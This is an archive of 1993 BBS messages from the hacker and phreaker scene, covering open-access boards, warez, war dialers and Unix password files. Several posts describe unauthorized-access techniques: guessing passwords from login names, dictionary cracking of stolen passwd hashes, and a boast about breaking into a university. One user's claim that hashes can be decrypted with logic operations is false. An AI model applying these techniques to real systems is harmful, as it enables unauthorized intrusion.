Oct 2 14:54:24 1993 From: tyrant@yabbs To: liqjesus@yabbs Subject: re: good old days Date: Sat Oct 2 14:54:24 1993 I think that you would have liked my board, but it is down now... No ratios (I actually killed the file section in the end), the only forms were to keep away dangerous unwanteds.. (People who thought that deleting HDs was fun were included as well as the obvious...), and it had a nice variety of message bases. (But they weren't used enough....) And peopler knew more than me! tyrant. From htoaster@yabbs Sat Oct 2 16:24:05 1993 From: htoaster@yabbs To: tyrant@yabbs Subject: re: good old days Date: Sat Oct 2 16:24:05 1993 on the subject of stuff, what do people think about the way that we have stuff setup here? As you should know, we don't require any information on anyone when they make accounts, anyone can make an account, and everyone gets access to everything on their first connect... htoaster From proteus@yabbs Sat Oct 2 19:41:21 1993 From: proteus@yabbs To: htoaster@yabbs Subject: re: good old days Date: Sat Oct 2 19:41:21 1993 oh man, this board is beautiful..totally free access. this is what cyberspace was supposed to be like. everyone starts out the same. everyone can learn. i dunno, but boards that have questionaires to weed out newbies aint real nice. how else are you gonna start? i mean, even twelve year old idiot crackers need to be created to keep a balance :-). sorry, but i remember it was terribly easy to start when everybody was learning at the same time. in short (if nothing i have said in the previous ten lines makes any sense, i hope this will) this is the ideal of bbses. this is what has been created with arpanet, and this is one helluva lot better than the "begining." local boards these days dont allow anyone -new-. cyberspace should be accessible by all. (oh. this last bit didnt make any sense either. sorry. forget about this post.) From ratpack@yabbs Sun Oct 3 13:35:26 1993 From: ratpack@yabbs To: comrade@yabbs Subject: re: Life & Death Date: Sun Oct 3 13:35:26 1993 From ratpack@yabbs Sun Oct 3 13:43:50 1993 From: ratpack@yabbs To: comrade@yabbs Subject: re: ... Date: Sun Oct 3 13:43:50 1993 Thanks for the nice comment about and yes, your account is still there. No cows in the advertisement. Yes I saw that, but I changed my cow so it's not the same one. How can a group take control of a complete object . BTW: Did you know that the church are 'owners' of the cross 'logo'... Anyways, later. From swami@yabbs Sun Oct 3 16:24:34 1993 From: swami@yabbs To: all@yabbs Subject: Newbies Date: Sun Oct 3 16:24:34 1993 Regarding weeding out the lamer's etc, the bottom line is that in the end, if the user is really deserving, he or she will find a way to get into the "scene." I spent about a year using a 1200bps modem and a dumb terminal just learning things before I even knew that p/h/a boards or anything of the like existed (this was indeed a long time ago.) If the user doesn't have a clue now, wait. If they are a good user-to-be, they'll figure it all out eventually. Hope that made any sense. swami From -Flare-@yabbs Sun Oct 3 19:55:43 1993 From: -Flare-@yabbs To: slim@yabbs Subject: re: tftp Date: Sun Oct 3 19:55:43 1993 so what? Just cuz you can get the passwd file doenst mean anything. Its encrypted, right? (If im totally wrong, shuddap, im new to the "scene") From -Flare-@yabbs Sun Oct 3 19:56:51 1993 From: -Flare-@yabbs To: invalid@yabbs Subject: re: Toneloc beta 10 Date: Sun Oct 3 19:56:51 1993 Whats TL? From -Flare-@yabbs Sun Oct 3 20:02:24 1993 From: -Flare-@yabbs To: greywolf@yabbs Subject: re: hack sites Date: Sun Oct 3 20:02:24 1993 Hmm, greywolf , your name soudns familiar. You live in CA? From -Flare-@yabbs Sun Oct 3 20:10:20 1993 From: -Flare-@yabbs To: pyro@yabbs Subject: re: HP Network... Date: Sun Oct 3 20:10:20 1993 Have'nt been following the messages, what are you gonna starT?? From bland@yabbs Mon Oct 4 00:26:40 1993 From: bland@yabbs To: all@yabbs Subject: yeah, i'm lame.... Date: Mon Oct 4 00:26:40 1993 i know this is a stupid thing to ask, but looking around on my own has got me nowhere. how can i start finding good ftp sites? good hack info. and where can i get into good talk on irc? i'm not really even looking for pirited shit or anything either, just some cool stuff you know? From pyro@yabbs Mon Oct 4 01:12:37 1993 From: pyro@yabbs To: all@yabbs Subject: BBS types... Date: Mon Oct 4 01:12:37 1993 I have run a BBS for about 8 years now, and for the past 4 I have had no requirements for getting access. You just call, give a name and password, and answer some simple questions (and they have no basis on access, so most people skip them) and there you go. Total file and message base access. Nothing to hide. Each user gets 30 minutes a day to do as the please. And believe it or not, it is a h/p orientated BBS> Lots of text files, good messages, but nothing explicitly illegal. Just good theory and ideas. Anyway, I have found this to be the best method I have ever used in running a BBS. Sure, it is not for everyone. There are too many "private" elitest boards, not enough public learning boards. Anyway, might as well give it a cheap plug: Propaganda (612) 874-9113 From greywolf@yabbs Mon Oct 4 01:58:19 1993 From: greywolf@yabbs To: all@yabbs Subject: me Date: Mon Oct 4 01:58:19 1993 I live in cyberspace :) From jcjc@yabbs Mon Oct 4 08:19:48 1993 From: jcjc@yabbs To: pez@yabbs Subject: H/P & Scaners/hacking Date: Mon Oct 4 08:19:48 1993 o first, let me say: I have no ftp access... but I will soon, working on it.. hmmn, I had access to the OLD, OLD MSP... and now I have Code Thief v. 3.15, and FH (can I say the magic word?:) v. 2.0 etc... mabye my H/P stuff is old but hey, talk to Pegasus, he would agree with me, San Diego is DEAD!!! thats why I got on the net.. hmmn, I am a phone phreak & Hacker from the EAST!!! dammit, I am thinking of moving back when I get old enough!! (3 more years til I can go, that is, if 18 is the age limit. :) hmmn, ok, I'll see what I can do, I have some new H/P files, (if you concider new :) hehe, ok, I like RISC and SUN systems, hey, to that guy that mentioned the con's, I dont think I'll be going, because I feel that you can get more useful information from SE's and other such people who have access to the machines and manuals then self proclaimed 'hackers' although there are still a few good ones out there... (as Kludge said...:) hmmn, I'd like to get on #hack/#phreak & #unix irc, etc.. ya know, if anyone can help me out, let me know... :) hey, San Diego, I run a board called Apocalyptic Electron (used to be Black in Black, til I found a nother one :) that is now called Piracetam) so I am still changing themes in the menus etc.. I have some good H/P stuff, etc.. :) but mostly into NEW, NEW stuff, I have an ANI for this area, from a good friends, and a few other things, but one guy gave me what he called divertor, now don't get me wrong, I know how to use certain things in certain situations, but anyone into it, call 1-800-225-3282 and tell me what is up with this one? its not a divertor..! ok, I am gonna be going to Germany... (schwienfurt soon) hmmmn, and I need to get some tickets, I have no email address yet, so call my board or something (or TUF.. Tampa Bay!:) ok? hmmn, I have so many German users, its not funny, (where do they get my number from??? hmmn, ok, talk to you guys later... sorry for the long post. but its sorta my untroduction, I'm into everything, (EVERYTHING!!!!, cept CAPITOLISM!:) heheh, ohh well, I'm an Anarchist... ) now who have I just pissed off? :) ok, laterz guys -[jc]2 <----SysOp of Apocalyptic Electron --AE-- :) From jcjc@yabbs Mon Oct 4 09:22:16 1993 From: jcjc@yabbs To: liqjesus@yabbs Subject: re: oldies Date: Mon Oct 4 09:22:16 1993 hehehehehe, ya, 0 days old warez.. intersting enough.. just talking with a usre in Maryland :) hehhe, Dial Tone... who is speaking with me about 0 - 30 minutes old software.. hmmn, now as many people might agree with me, I'd love to have a bbs, and have 12 million text files filled with todays latest information on the phone company, and have a nother section with 57 gigabytes of the 0 - 3 minute old stuff :) hehehhe now my favorite group - 4 Non Blondes is on, I'm loggin off. to watch this lovely woman :) on MTV... laterz.. (its a good song.. Spaceman :) hehe laterz -[jc]2 <-----SysOp of Apocalyptic Electron -AE-- From xenon@yabbs Mon Oct 4 10:25:36 1993 From: xenon@yabbs To: pyro@yabbs Subject: re: BBS types... Date: Mon Oct 4 10:25:36 1993 thats a great way to run a bbs. thats how i ran mine and will run it after i scrape some $$$ togeather to fix my busted HD. The only thing this board needs is an outside line...course, the only thing my board needs is a slip thru the nice, big university...heh --> Xenon From liqjesus@yabbs Thu Oct 7 14:54:46 1993 From: liqjesus@yabbs To: all@yabbs Subject: BBS's, etc. Date: Thu Oct 7 14:54:46 1993 now they have 0-3 minute old warez? Sounds like the pirate scene is getting dumber by the minute. I even read an intro screen by some pirate group recently (I won't mention names) where the guys are still posting insults at another group. This "we're number one" crap is truly annoying. I also agree that the Internet is MUCH more user-friendly as far as file ratios go, but I think the seven+ years of BBS training I had make me appreicate this stuff more. And, local BBS's are still a good spot to see how your scene is doing. -LJ- From xor@yabbs Fri Oct 8 20:26:48 1993 From: xor@yabbs To: all@yabbs Subject: replies. Date: Fri Oct 8 20:26:48 1993 re: ToneLoc there was a post a little while back asking what ToneLoc was. It is a programm written by Mucho Maas and Minor Threat. Basically it locates PBXes, carriers, and any quirky other array of things. It was very well written cause it includes stuff like a mapper program so you can see patterns in your scans that you might not notice otherwise (like an entire band of carriers, etc). Other things are included too like support for many modems, GUI, etc. etc. though I have found it to work best with USRobotics Courier modems. if its not here, I'll send it up if you want. ^ From tyrant@yabbs Sat Oct 9 14:23:39 1993 From: tyrant@yabbs To: admiral@yabbs Subject: re: good old days Date: Sat Oct 9 14:23:39 1993 Hmm.. But everyone has to learn somewhere.. An as to people who "leach," why do you let them on in the first place? Why have file sections if you're not willing to let people download files.. And what the hell does it show if you don't know what LOD stands for.... From tyrant@yabbs Sat Oct 9 14:26:30 1993 From: tyrant@yabbs To: xenon@yabbs Subject: re: good old days Date: Sat Oct 9 14:26:30 1993 Of course, another good reason to let people on is that if they aren't any good, decide that they need to get (as you put it) "on-the-job" training, and go out and get busted, it seems that they will probably give the number of every BBS that they know of, including (and probably) in particular the ones they are annoyed at (such as the ones that wouldn't let them on....) ea. From tyrant@yabbs Sat Oct 9 14:29:07 1993 From: tyrant@yabbs To: lordcybr@yabbs Subject: re: leeches Date: Sat Oct 9 14:29:07 1993 No file areas. You can have text files, but don't put them in file areas. Put them in bullitens (but the problem with text files is that the way that they change is that they are out-dated REALLY quickly, and probably not worth the bother). Make a lot of message bases on every concievable topic. Then get a few good users to call -- because of the complicated material, the bad users will be weeded out. ea From tyrant@yabbs Sat Oct 9 14:30:33 1993 From: tyrant@yabbs To: htoaster@yabbs Subject: re: good old days Date: Sat Oct 9 14:30:33 1993 I like that.. Very nice. From tyrant@yabbs Sat Oct 9 14:32:08 1993 From: tyrant@yabbs To: proteus@yabbs Subject: re: good old days Date: Sat Oct 9 14:32:08 1993 Of course, the other problem is that now there are a lot of people who pretend that they know a lot more than everyone else. In reality, they don't know all that much more. It's important to remeber that no one can know everything! ea From liqjesus@yabbs Sun Oct 10 14:39:03 1993 From: liqjesus@yabbs To: all@yabbs Subject: sysops from hell Date: Sun Oct 10 14:39:03 1993 Well, my thinking these days is that if I get pissed off at a sysop or his board, I just stop calling. I don't care if he's the "elitest" bastard in the world. If more people practiced this idea, soon those snotty sysops would find their user base dwindle down to nothing. -LJ- From wonko@yabbs Wed Oct 13 08:48:00 1993 From: wonko@yabbs To: all@yabbs Subject: re: tftp Date: Wed Oct 13 08:48:00 1993 who is this Flare guy, and should i bother replying to his post? as for the bbs thing, as soon as i have the machine (read: i need $$$) to run it from, i want to run yabbs as a multiline bbs. free access. real damn easy to get on, no questions to answer, just don't annoy people, that is my policy. there is one user in particular that i won't let on any board i ever run. he has to argue with everyone and is rarely right. he is one hell of an annoyance. he would be booted. that is the only requirement to be on my bbs. don't be an asshole. sorry if this don't make sense, i'm tired as usual. got to stop staying up till 2am coding. duh. -wonko From Flare@yabbs Wed Oct 13 19:36:50 1993 From: Flare@yabbs To: all@yabbs Subject: re: replies. Date: Wed Oct 13 19:36:50 1993 xor.. Could you(or anyone) tell me some anon ftp sites whre i can get stuff such as toneloc? l8r From Flare@yabbs Wed Oct 13 19:40:27 1993 From: Flare@yabbs To: wonko@yabbs Subject: re: tftp Date: Wed Oct 13 19:40:27 1993 Well, geeze, sorry if i did something wrong that im not aware of...btw, do you know what CCII stands for?) From wonko@yabbs Thu Oct 14 11:49:24 1993 From: wonko@yabbs To: Flare@yabbs Subject: re: tftp Date: Thu Oct 14 11:49:24 1993 you didn't do anything wrong. when i tried replying to your original message your name had a - before it and one after and when i tried replying it said no user with that name exists.. i was just wondering if you actually exsited so i wasn't wasting me breath. let me look back through the messages to see what i sould have replied to. -wonko From wonko@yabbs Thu Oct 14 11:51:03 1993 From: wonko@yabbs To: Flare@yabbs Subject: re: tftp Date: Thu Oct 14 11:51:03 1993 you wanted to know about passwd files. still want to know?? -wonko From xenon@yabbs Thu Oct 14 15:28:08 1993 From: xenon@yabbs To: wonko@yabbs Subject: re: tftp Date: Thu Oct 14 15:28:08 1993 thats the kinda system id like to run. seeing as how i cant even afford a new HD for my c=64 bbs, tho, forget about a multi-line free-access unix system from me for a while...heh. right now, id just be happy to get freeport running again. as for the obnoxious users, why dont u just let the other bbs users deal with them...a pea-brained user like that could easily conned by sum e-mail social engineering to give an offended person their phone, name, etc. then, its up to yer users imagination what they're gonna get...heh yer alwys gonna run th risk that sum assholes gonna give yer # to the feds. I say, the more the marrier. you might even get them to post and respond! well, i guess thats asking a bit too much, eh? i mean, as long as yer not running sum warez d00d bbs, and have stuff like that in the file transfers, yer gonna get a LOT of support from others in the computer community if sum asswipe fed thinks yer bbs contains "illegal" material. Oh no! they're talking bout grabbing passwd files and running them thru killer kracker! bust the bbs! Thats just BS in the lowest form. besides, the feds are on the run...they've realized that they cant just go around and close down bbss anymore. people arent gonna stand for them infringing on their rights to free speech. im not saying that all feds are assholes, but i dont know any personally and juging by their recent activities within the computer community, thats my impression. its just a bunch of political BS. Presidences MUST be set NOW before more injustice is done! the whole Steve ackson games trial wuz total shit...BUT good came out of it! im extremly glad that SJ Games wasnt forced into finantual ruin like craig niedorf was. i only wish that i could support them, but, alas, i cant even afford a new hd... i fully support eff, albiet they are a touch consertive, but it is a start. also, with the vast amount of confrences that bring feds, hackers, and other interested parties togeather, i can see an understanding developing between the parties. at least, a wide variety of views are shared amoung the attendees, (or so ive read...ive never been able to attend one although i would REALLY like to...) how this post became so long, i dont know...anywayz, if anyone in or near the 313 area would like to pitch sum monetary support my way in exchange for a ride and a room to a confrence like i mentioned before, lemme know thru e-mail. here or at l9er, ---> Xenon From Darkman@yabbs Fri Oct 15 11:26:29 1993 From: Darkman@yabbs To: all@yabbs Subject: re: santafe bbs Date: Fri Oct 15 11:26:29 1993 Umm...I keep trying to logon to Santafe, but when I connect it gives me no prompt or anything and it responds to nothing that I enter. It just cr's to the next line and lets me type some more. I'm convinced that the os is laughing at me!!! Waht Gives? I just want an email acct... From ea@yabbs Fri Oct 15 15:53:39 1993 From: ea@yabbs To: xenon@yabbs Subject: re: tftp Date: Fri Oct 15 15:53:39 1993 Well, I'm not sure if I agree with your handling of bad BBS users. It seems to me that if you leave it entirely up to the other users that the user will get angry (more likely to go to the feds), and more importantly, that you will waste a lot of space on silly messages bashing other users.. Ea, he whom nothing escapes. From Flare@yabbs Fri Oct 15 20:47:06 1993 From: Flare@yabbs To: wonko@yabbs Subject: re: tftp Date: Fri Oct 15 20:47:06 1993 Oh, ok.. Well, remember there was a crash or something a little bit ago here. From Flare@yabbs Fri Oct 15 20:47:24 1993 From: Flare@yabbs To: wonko@yabbs Subject: re: tftp Date: Fri Oct 15 20:47:24 1993 yes please(thanx.) From pyro@yabbs Fri Oct 15 23:34:15 1993 From: pyro@yabbs To: ea@yabbs Subject: re: tftp Date: Fri Oct 15 23:34:15 1993 Well, if you havrun the type of BBS that should worry about being busted by the friendly FBI then perhaps you should KNOW, in some way, everyone on your BBS. You would be stupid to let anyone on who might turn you in. The whole idea is just insane... If it is a piblic BBS... Well, do what you have to I guess. Its my opinion that a really good BBS does nopt have to worry about such people. Either the quality of the BBS detracts from such meaningless non-sense, or the users take care of it. Oh well. To each his own. -Pyro From ea@yabbs Sun Oct 17 15:16:41 1993 From: ea@yabbs To: pyro@yabbs Subject: re: tftp Date: Sun Oct 17 15:16:41 1993 It seems to me that one of the main problems is that people haven't caught on -- if they want to bust your bbs, they can. They'll get on. It's not that hard. Make sure that it is legal. And everything will be okay. From DrClaw@yabbs Mon Oct 18 02:15:49 1993 From: DrClaw@yabbs To: all@yabbs Subject: looking for board Date: Mon Oct 18 02:15:49 1993 UYo, i am looking for some good boards in area code 303...anyone have any good numbers...i am willing to trade the dialout there for some... mail me at regan10458 shit make that if you are interested... thanks From xenon@yabbs Mon Oct 18 11:39:20 1993 From: xenon@yabbs To: ea@yabbs Subject: re: tftp Date: Mon Oct 18 11:39:20 1993 yeah, but who to say whats legal??? i mean, seems to me that bbss are being busted for the stupidest reasons. make sure that it is legal...and everything might be ok... --> Xenon From Kel'anth@yabbs Mon Oct 18 20:36:54 1993 From: Kel'anth@yabbs To: htoaster@yabbs Subject: re: hackers test Date: Mon Oct 18 20:36:54 1993 re: mirroring WHY? I mean, you've already got the gopher gateway to there, and there are plenty of other sites mirroring that archive. Sorry to be sticking my nose in your business or whatever, but I just kinda hate to see good HD space wasted on stuff everyone knows where to look for, when ya got spacve you could be using for much more, well, unique and eclectic type of files. Please try to at least think about it... From htoaster@yabbs Mon Oct 18 21:20:58 1993 From: htoaster@yabbs To: Kel'anth@yabbs Subject: re: hackers test Date: Mon Oct 18 21:20:58 1993 In message re: hackers test, Kel'anth said: > re: mirroring wow...that was an old message... i'm not mirroring them, because i do have the gopher link to them and the etext archives. If you have anything you want on the ftp site let me know, since it has about 10 megs or so free... htoaster From deprogra@yabbs Tue Oct 19 01:21:20 1993 From: deprogra@yabbs To: all@yabbs Subject: toronto dialout Date: Tue Oct 19 01:21:20 1993 After I connect to and enter MODEM, I get garbage and it does not seem to accept any commands. Any ideas? From Kryptic@yabbs Tue Oct 19 02:12:16 1993 From: Kryptic@yabbs To: all@yabbs Subject: SMC BBS 503 Date: Tue Oct 19 02:12:16 1993 Servants of the Mushroom Cloud (503)NUC-LEAR 14.4k Over 600 files Specializing in H/P/A/C/V High Priest -=- Kryptic Night | | | /\/\ / | / \ / |/| / / \ | < \ / | \ \ | \ | \ Experience the Salvation! Home of SMC and the Doctrines of Deceit... an upcoming magazine orientated towards the high-end hacker. For more information please contact me, or another group member, on this board or through email at or nighttime ftp submission at (login as smc/submit) (submissions only) The number to the BBS is 503-251-3763 - All may apply... but only hackers may succeeed... Various levels of access for various levels of skill. Call and get NUKED! From jcjc@yabbs Tue Oct 19 04:05:22 1993 From: jcjc@yabbs To: liqjesus@yabbs Subject: re: BBS's, etc. Date: Tue Oct 19 04:05:22 1993 Well, last message I wrote, I was talking about the problems with software 0 - 3 minute old software, its a exageration - but thats how dumb its getting I dont get it... Whats wrong with this Warez Generation - they take up too much space!!! I have a 451 MB hard drive, and I would like to be able to fill it up with NEW software, but I have not the space, and these programs are just TOO BIG!!! so if I wanted to run an AE - Ascii Exchange, I am sure I could do it... but I dont know if I want to... anyways, in case no one got it, I am against Warez, I have access to boards with them on there, but I am against them! ok, I might be joining a group called "Phiber Weasles" its a H/P grouyp, ohh well, my GF is moving back to Texas... SHIT!... wants to live with her parrents.. I'm gonna help her pack this weekend.. talk to you all later -[jc]2 <---SysOp of Apocalyptic Electron --AE-- From PBandana@yabbs Tue Oct 19 15:02:26 1993 From: PBandana@yabbs To: wonko@yabbs Subject: pword files Date: Tue Oct 19 15:02:26 1993 Well, I'd like to know about password files ... advTHANKSance -=-=-=-=-=-=-=- PurPle BaNdana -=-=-=-=-=-=-=- From wonko@yabbs Tue Oct 19 17:50:04 1993 From: wonko@yabbs To: PBandana@yabbs Subject: re: pword files Date: Tue Oct 19 17:50:04 1993 very simple, in the directory /etc is a file named passwd it has all the account userids and passwords (encoded) and other neat info like what shell they use when the log on and what group they are a part of. that is how it used to be anyway, now, in the slot where the password goes you usually find an '*' in it's place. this means the passwords are in a file called shadow, which only root has rights to. i will post a small example sometime when i have the chance, maybe next message. -wonko ps -- hope it was helpful. From wonko@yabbs Tue Oct 19 19:00:29 1993 From: wonko@yabbs To: PBandana@yabbs Subject: re: pword files Date: Tue Oct 19 19:00:29 1993 here is a small passwd file i quick made up: root:IIOV8Fxdm.Lw:0:0:Root Login:/:/bin/csh here is a description of each entry: root - login name IIOV8Fxdm.Lw - encrypted password with key first 0 - user ID second 0 - group Root Login - In real life entry, usually real name :/ - home directory - rooit gets root, imagine that. :/bin/csh - shell if the password has an * in it's place it is shadowed. gotta go, mj is paging me. From cosmos@yabbs Wed Oct 20 01:11:18 1993 From: cosmos@yabbs To: DrClaw@yabbs Subject: re: looking for board Date: Wed Oct 20 01:11:18 1993 K00l K0dEz! Cosmos From wonko@yabbs Wed Oct 20 08:37:13 1993 From: wonko@yabbs To: cosmos@yabbs Subject: re: pword files Date: Wed Oct 20 08:37:13 1993 here is a little trick we picked up from hacking lehigh u. grab the passwd file. even if the accounts are shadowed try this. try the login as the password, you will be suprised how many actually work. we got into lehigh that way. none of the student accounts are in passwd, they are all in shadow with no reference from passwd (something my sysadmin was teaching me how to do, cuts down on one big ass security hole. most people don't play with what they can't see) but the maint accounts and admin accounts were all in passwd but shadowed. out of the 37 accounts in passwd 17!!!!!!!! used the login as the passwd. that has been changed because of me, but i had to make a deal somehow. i said yea, if i give you info about your system to help with security holes, you get me off light. they said ok, i told them about 5 of the 17 accounts, a week later all 17 were changed. i guess they descided to check them all. oh well. -wonko From Flare@yabbs Wed Oct 20 19:31:12 1993 From: Flare@yabbs To: wonko@yabbs Subject: re: pword files Date: Wed Oct 20 19:31:12 1993 Try the login as the password? what does that sentence mean? From cosmos@yabbs Wed Oct 20 20:38:43 1993 From: cosmos@yabbs To: Flare@yabbs Subject: re: pword files Date: Wed Oct 20 20:38:43 1993 *grin* It means if you have the account "guest" use that as the password. Next step for you is to hit the library and get some UNIX books. Cosmos From wonko@yabbs Thu Oct 21 11:09:23 1993 From: wonko@yabbs To: cosmos@yabbs Subject: re: pword files Date: Thu Oct 21 11:09:23 1993 that is a good idea, read, it is the second best way to learn. i would recomend "Using Unix" by: Que for unix stuff i ripped a copy from a local book store an i must say it is the best steal so far. very good info. if you want info about internet, i would recommend: "The Whole Internet: User's Guide & Catalog" by: Ed Krol, published by O"Reilly & Associates, Inc. l8r all, -wonko ps-- i am going to look at used Suns tonight, hope i find something i like that i can afford. From hbeast@yabbs Fri Oct 22 08:34:29 1993 From: hbeast@yabbs To: all@yabbs Subject: learning Date: Fri Oct 22 08:34:29 1993 Speaking of where new people can learn, how about those education boards? Which breings me to my question, how many of those are still up? (Like the Phoenix Project, Phreak Klass 2600, etc). This wasn't phrased so well. I don't want to know if TPJ or PK are up, I want to know about current educational boards. herd beast From cosmos@yabbs Fri Oct 22 16:42:16 1993 From: cosmos@yabbs To: hbeast@yabbs Subject: re: learning Date: Fri Oct 22 16:42:16 1993 Um, I never learned anything much from any board. Even the so-called best and most elite...cept how to inflate my ego. If you want to learn, start hitting the books, and experimenting with systems. Start with a public acces *NIX account and go from there. Dont expect people to tell you what to do. Use your own curiosity and drive to feed your mind, this is true hacking. Anyone can get K00l K0dEz and 0-3 day WaReZ. Boards can give you small pointers...if you can wade through most of the lite buulshit. Cosmos From Green@yabbs Fri Oct 22 18:57:02 1993 From: Green@yabbs To: cosmos@yabbs Subject: re: learning Date: Fri Oct 22 18:57:02 1993 Yeah .. another thing I've learned about hacking in general (I've only been interested for 2 months or so now seriously) is that you should watch what people say to you; ie, don't jump and do whatever people tell you to do. Hey man, telnet 19 and use the password 'wiz', it's an elite backdoor.. riiiight. Don't give in to people on irc saying 'gimme ur el3et wareZzzz'.. Don't let yourself be pushed around, ask a lot of questions, read a lot of man pages, experiment a lot. Persistence has, IMHO, taught me a lot more than eliteness. green From jasonlee@yabbs Fri Oct 22 19:06:52 1993 From: jasonlee@yabbs To: cosmos@yabbs Subject: re: learning Date: Fri Oct 22 19:06:52 1993 I think one of the best ways to learn is to find some ex-hacker who can tell you all the cool stories of the past and encourage you to progress on your own. A mentor is what I'm suggesting. That's how I got interested in stuff. JasonLee From cosmos@yabbs Sat Oct 23 15:11:29 1993 From: cosmos@yabbs To: Green@yabbs Subject: re: learning Date: Sat Oct 23 15:11:29 1993 Very good observations. Well, I have been actively into the hacking state since '85 or so. It has changed alot and in my opinion has spiraled into a who is better than who state. Oh well. I stand back and observe mostly now. Try to help out when possible. Flame the lamers...:) Good luck in your endeavours. Cosmos From cosmos@yabbs Sat Oct 23 15:14:36 1993 From: cosmos@yabbs To: jasonlee@yabbs Subject: re: learning Date: Sat Oct 23 15:14:36 1993 Not true. Cool stories of past follies does nothing than perpetuate legend and eliteness. It is always fun to hear them and admire their accomplishments, but it tends to put visions of sugarplum fairies dancing in their heads....if you know what I mean. A mentor is a good thing to have. If that mentor does nothing but encourage and teach the operating system to you...a mentor that hands out codes and loopholes perpetuates the problems. Cosmos From xenon@yabbs Sat Oct 23 16:42:46 1993 From: xenon@yabbs To: cosmos@yabbs Subject: re: learning Date: Sat Oct 23 16:42:46 1993 true, but stories are good so people know what was possible at one time.. if ya kno what people have been able to do and how they did it, it promotes a deeper understanding of the system. sumone who just hands out codez isnt a teacher, i agree, but ya gotta know the history to be able to understand the bare essentuals. besides, culture is something that keeps a culture togeather... --> Xenon From xenon@yabbs Sat Oct 23 16:44:03 1993 From: xenon@yabbs To: xenon@yabbs Subject: re: learning Date: Sat Oct 23 16:44:03 1993 er, folklore is sumthing that keeps a culture togeather... From Intruder@yabbs Sat Oct 23 17:34:03 1993 From: Intruder@yabbs To: wonko@yabbs Subject: re: pword files Date: Sat Oct 23 17:34:03 1993 Yo! Hhehehe yah that trick isa very fuuny! i dunno why those operators dont hide that passwd files! it is so imple to get it! i got some account on an system this way!!! My friend try a university here in my area and when he logoin into one of the server they were nothing so he find that strange, and when he have do ctrl D well he saew a pomrp! yah the system was so lame thsat when people loss crrier the system dont logoff the guyz mouahaha! then he go to dir /etc and dl the passwd files!!! Anyway you just chek the username if they loook like this Bergeron::100;20:Stepahne Bergeron:/home/bergeron ... ^ there it is supposed to be the pw! so if they are nothing that means they y are no pw!!! the rest of the time it is encrypt thing but it is possiblre to deecnrypt them with some mathematical operation like ADN or OR locical!!! Intruder/MYTH+EMPIRE is outta here!!! From pharmer@yabbs Sun Oct 24 00:54:22 1993 From: pharmer@yabbs To: Intruder@yabbs Subject: re: pword files Date: Sun Oct 24 00:54:22 1993 You can't decrypt them, but you can make brute force attacks by running a dictionary against the encrypted passwords, get a hold of something like cracker jack 1.4 and a big dictionary. Also, run the passwd on the system whose file you grabbed so that you know if a word has to have a number at some point, or must contain a capitla letter, then pre-process your dictionary so that it meets those requirements. Of course, i am not advocating that you do this, just that if you were, theoretically trying to get passwords, this would be a way to do it. -me From Datastre@yabbs Sun Oct 24 05:56:46 1993 From: Datastre@yabbs To: all@yabbs Subject: Date: Sun Oct 24 05:56:46 1993 The Sanctuary UK +44-812042182 8pm-8am GMT 'For the sierous h/p enthusast' h/p only. SysOp: |>atastream Cowboy From swami@yabbs Sun Oct 24 12:43:48 1993 From: swami@yabbs To: all@yabbs Subject: PGP Date: Sun Oct 24 12:43:48 1993 So what do ya'll think about PGP? swami From Intruder@yabbs Sun Oct 24 13:38:14 1993 From: Intruder@yabbs To: pharmer@yabbs Subject: re: pword files Date: Sun Oct 24 13:38:14 1993 Yo! Well you maybe going to be surprised but it is Possible to deencrypt them! since my firne din Sweden have deencrypt 26 users name with his small program! and i can tel you the pw he find were not easy to find like SEAME01, or NET01 thing that have absolutely nothing to do with the udernamne! Now i am looking for a way to enter a system where i dont have any access at all!!! is there a way to enter? i dunno with some default username or whatver? Intruder/MYTH+EMPIRE is outta here!!! From Intruder@yabbs Sun Oct 24 13:40:03 1993 From: Intruder@yabbs To: Datastre@yabbs Subject: re: Date: Sun Oct 24 13:40:03 1993 Hmmm do you know if they are some OD for UK? hehehe i might be interested in calling there! shit here in Montreal, Canada getting codez is like almost impossible!!! Intruder/MYTH+EMPIRE is outta here!!! From cosmos@yabbs Sun Oct 24 15:18:40 1993 From: cosmos@yabbs To: Intruder@yabbs Subject: re: Date: Sun Oct 24 15:18:40 1993 So is MYTH+EMPIRE a real K00l 3lit3 K-RaD group?? Perhaps like, NASP, Nuke, KoK, and countless others. Can you get me some real neato codes too??? God, I just love codes. Cosmos From xenon@yabbs Sun Oct 24 18:57:28 1993 From: xenon@yabbs To: Intruder@yabbs Subject: re: pword files Date: Sun Oct 24 18:57:28 1993 right, you can decrypt /etc/passwd. uh huh...sure...Id love to see that program of yers! why dont u put up the source? that wud make me a believer! --> Xenon From ziplock@yabbs Sun Oct 24 19:56:41 1993 From: ziplock@yabbs To: xenon@yabbs Subject: re: pword files Date: Sun Oct 24 19:56:41 1993 Decrypting passwd's in /etc/passwd is not that hard. I would venture a guess that 90% of university computing sites have at least one entry where the passwd is the same as the login name and away you go. Making a test for "joe" passwd's where the user has just used their login name for the passwd is extremely easy and doesn't produce anywhere near the kind of noticable load that running crack with fat dictionaries will. All you do is grab the user names, crypt them, compare them, go on to the next one. A 300-user passwd file can be done in a minute or two on a reasonable machine. From cosmos@yabbs Sun Oct 24 20:22:05 1993 From: cosmos@yabbs To: xenon@yabbs Subject: re: pword files Date: Sun Oct 24 20:22:05 1993 I think he meant a program like Muffet's Crack or Crackerjack. That can match encrypted passwd's. In any case that is easy enough. I have never seen a program to decrypt straight passwords... Or perhaps another misinformed user... :) Cosmos From Kryptic@yabbs Sun Oct 24 23:45:55 1993 From: Kryptic@yabbs To: all@yabbs Subject: oasswd Date: Sun Oct 24 23:45:55 1993 Just to clear up a misconception... * means that the login is notable to be logged into noramlly.. 'x' means shadow... * would be used on shit like ftp... not really feasable to hack on... From xenon@yabbs Mon Oct 25 01:57:00 1993 From: xenon@yabbs To: ziplock@yabbs Subject: re: pword files Date: Mon Oct 25 01:57:00 1993 what i got outta the post is that he wuz able to decrypt /etc/passwd straight. i know bout the crypt/compare biggie in that. if, however, the claim was to take cryped input, run thru sum algorythum, and output a de-crypet output, THAT is what i wud like to see. However, unless the NSA is involved, i dont think so...heh...if the NSA IS involved, i really wouldnt like to see it either...heh --> Xenon From xenon@yabbs Mon Oct 25 02:00:06 1993 From: xenon@yabbs To: Intruder@yabbs Subject: EMPIRE Date: Mon Oct 25 02:00:06 1993 you wouldn't happen to do 64 demos, or is it just warez? If ya do demos, ya gotta give me a number to call and get em... --> Xenon (still uses his 64) From jasonlee@yabbs Mon Oct 25 02:45:35 1993 From: jasonlee@yabbs To: ziplock@yabbs Subject: re: pword files Date: Mon Oct 25 02:45:35 1993 Yeah, but you didn't describe 